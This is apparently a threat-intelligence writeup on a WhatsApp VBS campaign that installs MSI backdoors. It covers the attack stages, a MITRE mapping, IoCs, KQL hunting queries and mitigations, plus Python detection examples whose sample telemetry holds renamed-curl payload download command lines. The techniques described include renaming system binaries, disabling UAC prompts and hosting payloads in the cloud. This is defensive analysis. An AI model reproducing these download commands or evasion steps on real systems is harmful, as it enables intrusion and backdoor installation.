WhatsApp Malware Campaign Delivering VBS Payloads and MSI Backdoors

Executive Summary
In late February 2026, Microsoft Defender Experts detected a sophisticated attack campaign leveraging WhatsApp to distribute malicious Visual Basic Script (VBS) files to Windows users. Once a victim executes the file, a multi-stage infection chain is triggered, ultimately granting the attacker full system control via MSI backdoors. What makes this campaign particularly notable is its combination of social engineering, Living-off-the-Land (LotL) techniques, and public cloud infrastructure to evade security solutions.
Threat Landscape
This campaign reflects a growing trend of abusing trusted communication platforms like WhatsApp to deliver malware. Rather than relying on traditional email phishing, attackers exploit the inherent trust users place in familiar messaging applications to lower their psychological defenses. Notably, the lure content used to convince victims to open the VBS file has not yet been identified.
Detailed Attack Chain
The campaign unfolds across four distinct stages, each building the foundation for the next:
Stage 1 — Initial Access via WhatsApp
A malicious VBS file is sent directly through a WhatsApp message. Upon execution, the script:
- Creates a hidden directory at C:\ProgramData\EDS8738
- Copies and renames legitimate Windows tools: curl.exe → netapi.dll, bitsadmin.exe → sc.exe
- Leaves the renamed files' PE version metadata (OriginalFileName) untouched, which creates a detectable anomaly for EDR solutions
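The Stage 1 anomaly, as an added Python example (not code from the report or from Microsoft): it walks a PE's resource tree to the VS_VERSIONINFO block and compares the compiled-in OriginalFilename with the name on disk, which is what catches curl.exe running as netapi.dll. Only the standard library is used; the function names are mine, `version_resource` expects the whole file's bytes, and the test values are constructed.

```python
import struct

RT_VERSION = 16  # resource type id under which VS_VERSIONINFO is stored

def version_resource(pe: bytes) -> bytes:
    """Return the raw VS_VERSIONINFO blob from a PE image (first RT_VERSION entry)."""
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]                      # e_lfanew
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = (struct.unpack_from("<H", pe, pe_off + k)[0] for k in (6, 20))
    opt = pe_off + 24
    pe32plus = struct.unpack_from("<H", pe, opt)[0] == 0x20B
    res_rva = struct.unpack_from("<I", pe, opt + (0x70 if pe32plus else 0x60) + 2 * 8)[0]  # DataDirectory[2]
    secs = [struct.unpack_from("<IIII", pe, opt + opt_size + 40 * i + 8) for i in range(nsec)]  # VSize, VA, RawSize, RawPtr

    def rva2off(rva):
        for vsize, va, rsize, rptr in secs:
            if va <= rva < va + max(vsize, rsize):
                return rva - va + rptr
        raise ValueError("RVA %#x not backed by a section" % rva)

    def entries(dir_off):  # IMAGE_RESOURCE_DIRECTORY: entry counts at +12, 8-byte entries from +16
        named, ids = struct.unpack_from("<HH", pe, dir_off + 12)
        return [struct.unpack_from("<II", pe, dir_off + 16 + 8 * i) for i in range(named + ids)]

    base = rva2off(res_rva)
    sub = next((off for ident, off in entries(base) if ident == RT_VERSION), None)
    if sub is None:
        raise ValueError("no RT_VERSION resource")
    sub = entries(base + (sub & 0x7FFFFFFF))[0][1]                      # level 2: first name/id entry
    leaf = entries(base + (sub & 0x7FFFFFFF))[0][1]                     # level 3: first language entry
    data_rva, size = struct.unpack_from("<II", pe, base + leaf)         # IMAGE_RESOURCE_DATA_ENTRY
    return pe[(start := rva2off(data_rva)):start + size]

def original_filename(verinfo: bytes):
    """Read the OriginalFilename value out of a VS_VERSIONINFO blob (UTF-16LE strings)."""
    key = "OriginalFilename".encode("utf-16-le") + b"\0\0"
    i = verinfo.find(key)
    if i < 0:
        return None
    i += len(key) + (-(i + len(key)) % 4)                   # value is DWORD-aligned after the key
    end = i
    while verinfo[end:end + 2] not in (b"\0\0", b""):       # scan to the UTF-16 terminator
        end += 2
    return verinfo[i:end].decode("utf-16-le", "ignore")

def is_masquerading(disk_name: str, verinfo: bytes) -> bool:
    """Flag files whose on-disk name disagrees with the compiled-in OriginalFilename."""
    orig = original_filename(verinfo)
    return orig is not None and orig.lower() != disk_name.lower()
```

Run it over a directory as `is_masquerading(p.name, version_resource(p.read_bytes()))` for each file; a file with no version resource raises ValueError and should be treated as unknown rather than clean.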
Stage 2 — Cloud Payload Retrieval
Using the renamed binaries with downloader flags, the malware connects to reputable cloud services to fetch secondary payloads:
- auxs.vbs and WinUpdate_KB5034231.vbs are hosted on AWS S3, Tencent Cloud, and Backblaze B2
- Because the requests go to reputable cloud services, they look like normal system traffic and are extremely difficult to distinguish from legitimate activity
Stage 3 — Privilege Escalation & Persistence
This is the most critical stage of the campaign:
- The malware modifies the ConsentPromptBehaviorAdmin registry value to disable UAC prompts
- It repeatedly attempts to launch cmd.exe with elevated privileges, looping until successful or forcibly interrupted
- Persistence is written to HKLM\Software\Microsoft\Win to survive reboots
- The entire privilege escalation process occurs without any user interaction
Stage 4 — Final Backdoor Deployment
The final stage installs MSI packages that are not digitally signed:
| Filename | Description |
|---|---|
| AnyDesk.msi | Impersonates legitimate remote control software, establishes persistent access |
| Setup.msi | Generic backdoor installer |
| WinRAR.msi | Impersonates a popular archiving tool |
| LinkPoint.msi | Additional backdoor installer |
Through the fake AnyDesk installation, the attacker achieves persistent remote access, enabling data exfiltration, additional malware deployment, or enrollment of the system into a botnet.
Technical Analysis
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Details |
|---|---|---|---|
| Initial Access | Phishing via Messaging Platform | T1566 | VBS delivered via WhatsApp |
| Execution | User Execution: Malicious File | T1204.002 | Victim manually executes VBS |
| Defense Evasion | Masquerading: Rename System Utilities | T1036.003 | curl.exe → netapi.dll |
| Defense Evasion | Abuse of Trusted Cloud Services | T1102 | AWS, Tencent, Backblaze |
| Privilege Escalation | Abuse Elevation Control: Bypass UAC | T1548.002 | Registry UAC bypass |
| Persistence | Registry Run Keys / Startup Folder | T1547.001 | HKLM registry modification |
| Command & Control | Remote Access Software | T1219 | AnyDesk backdoor |
Evasion Highlights
This campaign is particularly dangerous due to the simultaneous use of multiple evasion techniques. The combination of legitimate Windows binaries (LotL) with cloud hosting renders signature-based and domain reputation-based security solutions largely ineffective. Furthermore, delayed execution and staged delivery help bypass sandbox behavioral analysis systems.
Indicators of Compromise (IoCs)
SHA-256 Hashes — VBS Scripts (Initial Stage)
| Hash | Description |
|---|---|
| a773bf0d400986f9bcd001c84f2e1a0b614c14d9088f3ba23ddc0c75539dc9e0 | Initial VBS from WhatsApp |
| 22b82421363026940a565d4ffbb7ce4e7798cdc5f53dda9d3229eb8ef3e0289a | Initial VBS from WhatsApp |
SHA-256 Hashes — VBS Droppers (Cloud Stage)
| Hash | Description |
|---|---|
| 91ec2ede66c7b4e6d4c8a25ffad4670d5fd7ff1a2d266528548950df2a8a927a | Script from cloud storage |
| 1735fcb8989c99bc8b9741f2a7dbf9ab42b7855e8e9a395c21f11450c35ebb0c | Script from cloud storage |
| 5cd4280b7b5a655b611702b574b0b48cd46d7729c9bbdfa907ca0afa55971662 | Script from cloud storage |
| 630dfd5ab55b9f897b54c289941303eb9b0e07f58ca5e925a0fa40f12e752653 | Script from cloud storage |
SHA-256 Hashes — MSI Installers (Final Payload)
| Hash | Description |
|---|---|
| dc3b2db1608239387a36f6e19bba6816a39c93b6aa7329340343a2ab42ccd32d | MSI installer |
| a2b9e0887751c3d775adc547f6c76fea3b4a554793059c00082c1c38956badc8 | MSI installer |
| 15a730d22f25f87a081bb2723393e6695d2aab38c0eafe9d7058e36f4f589220 | MSI installer |
URLs — Cloud Payload Hosting
| URL | Service |
|---|---|
| hxxps[:]//bafauac.s3.ap-southeast-1.amazonaws[.]com | Amazon S3 |
| hxxps[:]//yifubafu.s3.ap-southeast-1.amazonaws[.]com | Amazon S3 |
| hxxps[:]//9ding.s3.ap-southeast-1.amazonaws[.]com | Amazon S3 |
| hxxps[:]//f005.backblazeb2.com/file/bsbbmks | Backblaze B2 |
| hxxps[:]sinjiabo-1398259625[.]cos.ap-singapore.myqcloud.com | Tencent Cloud |
C2 Domains
| Domain | Role |
|---|---|
| Neescil[.]top | Command & Control |
| velthora[.]top | Command & Control |
Hunting Queries (Microsoft Defender / KQL)
The following queries were provided by Microsoft to hunt for related activity:
Detect malicious VBS script execution:

```kql
DeviceProcessEvents
| where InitiatingProcessFileName has "wscript.exe"
| where InitiatingProcessCommandLine has_all ("wscript.exe",".vbs")
| where ProcessCommandLine has_all ("ProgramData","-K","-s","-L","-o", "https:")
```

Detect next-stage VBS payload retrieval:

```kql
DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".vbs"
```

Detect malicious MSI installer drop:

```kql
DeviceFileEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where FileName endswith ".msi"
```

Detect outbound C2 communication:

```kql
DeviceNetworkEvents
| where InitiatingProcessFileName endswith ".dll"
| where InitiatingProcessVersionInfoOriginalFileName contains "curl.exe"
| where InitiatingProcessCommandLine has_all ("-s","-L","-o", "-k")
```
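Before deploying the queries above, a detection engineer usually checks that each one fires on the telemetry it is meant to catch and stays quiet on the real, unrenamed curl.exe. The Python harness below is an added example (not Microsoft's code): it restates the four queries as predicates over constructed Defender-style rows, and goes one step beyond the page by adding a rule for the ConsentPromptBehaviorAdmin change that the mitigation section asks to alert on. Column names match the Defender tables; `has_all` is approximated as a case-insensitive substring match, and every sample value is constructed.

```python
FIELDS = ("InitiatingProcessFileName", "InitiatingProcessCommandLine", "ProcessCommandLine", "FileName",
          "InitiatingProcessVersionInfoOriginalFileName", "RegistryValueName", "RegistryValueData")

def ev(table, **fields):
    """Build one event row; columns a given table lacks default to ""."""
    row = dict.fromkeys(FIELDS, "")
    row.update(fields, table=table)
    return row

def has_all(text, *terms):  # approximates KQL has_all (case-insensitive; real `has` is term-based)
    return all(t.lower() in text.lower() for t in terms)

def renamed_curl(e):  # Stage 1 anomaly: runs as *.dll but the PE OriginalFileName still says curl.exe
    return (e["InitiatingProcessFileName"].lower().endswith(".dll")
            and "curl.exe" in e["InitiatingProcessVersionInfoOriginalFileName"].lower())

RULES = {  # one predicate per hunting query above, keyed by a short alert name
    "vbs_launches_renamed_downloader": lambda e: e["table"] == "DeviceProcessEvents"
        and "wscript.exe" in e["InitiatingProcessFileName"].lower()
        and has_all(e["InitiatingProcessCommandLine"], "wscript.exe", ".vbs")
        and has_all(e["ProcessCommandLine"], "ProgramData", "-K", "-s", "-L", "-o", "https:"),
    "next_stage_vbs_written": lambda e: e["table"] == "DeviceFileEvents"
        and renamed_curl(e) and e["FileName"].lower().endswith(".vbs"),
    "msi_backdoor_written": lambda e: e["table"] == "DeviceFileEvents"
        and renamed_curl(e) and e["FileName"].lower().endswith(".msi"),
    "c2_via_renamed_curl": lambda e: e["table"] == "DeviceNetworkEvents"
        and renamed_curl(e) and has_all(e["InitiatingProcessCommandLine"], "-s", "-L", "-o", "-k"),
    "uac_prompt_disabled": lambda e: e["table"] == "DeviceRegistryEvents"  # added: Stage 3 tamper
        and e["RegistryValueName"] == "ConsentPromptBehaviorAdmin" and e["RegistryValueData"] == "0",
}

def triage(events):
    """Return (alert name, event) pairs for every event that trips a rule, in input order."""
    return [(name, e) for e in events for name, rule in RULES.items() if rule(e)]

# Constructed sample telemetry (not real IoCs); the path follows the report's Stage 1 layout.
DLL = r"C:\ProgramData\EDS8738\netapi.dll"
SAMPLE = [
    ev("DeviceProcessEvents", InitiatingProcessFileName="wscript.exe",
       InitiatingProcessCommandLine=r'wscript.exe "C:\Users\u\Downloads\photo.vbs"',
       ProcessCommandLine=DLL + " -K -s -L -o auxs.vbs https://bucket.example/auxs.vbs"),
    ev("DeviceFileEvents", InitiatingProcessFileName="netapi.dll",
       InitiatingProcessVersionInfoOriginalFileName="curl.exe", FileName="auxs.vbs"),
    ev("DeviceFileEvents", InitiatingProcessFileName="netapi.dll",
       InitiatingProcessVersionInfoOriginalFileName="curl.exe", FileName="AnyDesk.msi"),
    ev("DeviceNetworkEvents", InitiatingProcessFileName="netapi.dll",
       InitiatingProcessVersionInfoOriginalFileName="curl.exe",
       InitiatingProcessCommandLine=DLL + " -s -L -o Setup.msi -k https://bucket.example/s"),
    ev("DeviceRegistryEvents", RegistryValueName="ConsentPromptBehaviorAdmin", RegistryValueData="0"),
]
```

Each SAMPLE row should trip exactly one rule, while a row for the genuine curl.exe (name and OriginalFileName both curl.exe) trips none.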
Mitigation & Recommendations
Endpoint Controls
- Restrict script hosts (wscript.exe, cscript.exe, mshta.exe) in untrusted paths
- Monitor renamed Windows binaries executing with anomalous flags, especially curl and bitsadmin downloader flags
- Enable EDR in block mode to neutralize malicious artifacts even when antivirus does not detect them
Network & Cloud Monitoring
- Audit and filter outbound traffic to public cloud services (AWS S3, Tencent Cloud, Backblaze B2) in enterprise contexts
- Block connections to known C2 domains: Neescil[.]top, velthora[.]top
Persistence Detection
- Continuously monitor registry changes at HKLM\Software\Microsoft\Win
- Alert on modifications to ConsentPromptBehaviorAdmin (indicator of UAC bypass)
- Flag MSI package installations that lack valid digital signatures
User Awareness
- Train employees never to open attachments (especially .vbs, .js, .bat) received via messaging platforms such as WhatsApp — even from known contacts
- Establish a clear incident reporting process for suspicious messages or files received via any communication channel
Microsoft-Specific Recommendations
- Enable cloud-delivered protection in Microsoft Defender Antivirus
- Activate Tamper Protection combined with DisableLocalAdminMerge
- Enable Attack Surface Reduction (ASR) rules to block LotL techniques
Microsoft Defender Detections
| Tactic | Observed Activity | Detection Name |
|---|---|---|
| Initial Access | Malicious VBS downloaded via WhatsApp | Trojan:VBS/Obfuse.KPP!MTB |
| Execution / Defense Evasion | Renaming curl.exe, bitsadmin.exe | Suspicious curl behavior |
| Privilege Escalation | Reading UAC settings, modifying registry | Trojan:VBS/BypassUAC.PAA!MTB |
Analyst Assessment
This campaign demonstrates a high level of sophistication, integrating multiple evasion layers within a single, cohesive attack chain. The abuse of globally trusted cloud services (AWS, Tencent, Backblaze) reflects an emerging trend of "living off trusted services" — an evolution beyond traditional LotL techniques. While Microsoft has not publicly attributed this activity to a specific threat actor, the overall sophistication and the use of AnyDesk as a persistent C2 mechanism strongly suggest the work of an organized APT group or a professional cybercrime operation targeting enterprises. This campaign serves as a critical reminder that no platform is inherently safe, and enforcing a zero-trust policy toward all received files — regardless of the application used — is a non-negotiable requirement in today's enterprise security posture.